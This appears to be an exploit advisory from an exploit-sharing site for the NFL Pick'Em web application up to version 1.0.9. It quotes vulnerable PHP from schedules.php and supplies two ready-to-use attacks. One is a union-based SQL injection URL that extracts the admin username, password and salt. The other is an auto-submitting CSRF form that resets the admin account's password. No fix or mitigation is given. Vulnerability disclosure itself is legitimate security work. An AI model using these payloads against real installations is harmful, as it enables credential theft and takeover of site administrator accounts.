NFL Pick'Em <= 1.0.9 Multiple vulnerabilities

Download | Vote Up (0) | Vote Down (0)

# Version: 1.0.9
# Dork: Not yet

SQL Injection
=============

---------------[schedules.php]---------------

1
2$week = $_GET['week'];// L.7
3$where .= " where weekNum = " . $week;// L.53
4
5// L.56
6$sql .= $where . " order by gameTimeEastern";
7$query = mysql_query($sql);

---------------[schedules.php]---------------

Therefore we can easily inject in the week get parameter.

PoC: http://pentest.lan/pickem/schedules.php?week=-3%20union%20select%201,%28SELECT%20concat%28username,%200x3a,%20password,%200x3a,%20salt%29%20FROM%20nflp_users%20LIMIT%201%29,3,4,5,6,7,8,9,10,11,12,13,14--%20-

(Union-based simple injection to get admin username and pass+salt)

Cross site request forgery
==========================

<body onload='document.forms[0].submit()'>
<form method='post' action='http://pentest.lan/pickem/user_edit.php'>
<input type='hidden' name='firstname' value='Admin'>
<input type='hidden' name='lastname' value='Admin'>
<input type='hidden' name='email' value='admin%40yourdomain.com'>
<input type='hidden' name='password' value='aaaaaa'>
<input type='hidden' name='password2' value='aaaaaa'>
<input type='hidden' name='submit' value='Submit'>

</form>
</body>

Groucho

Be the first to give feedback !
Please login to comment !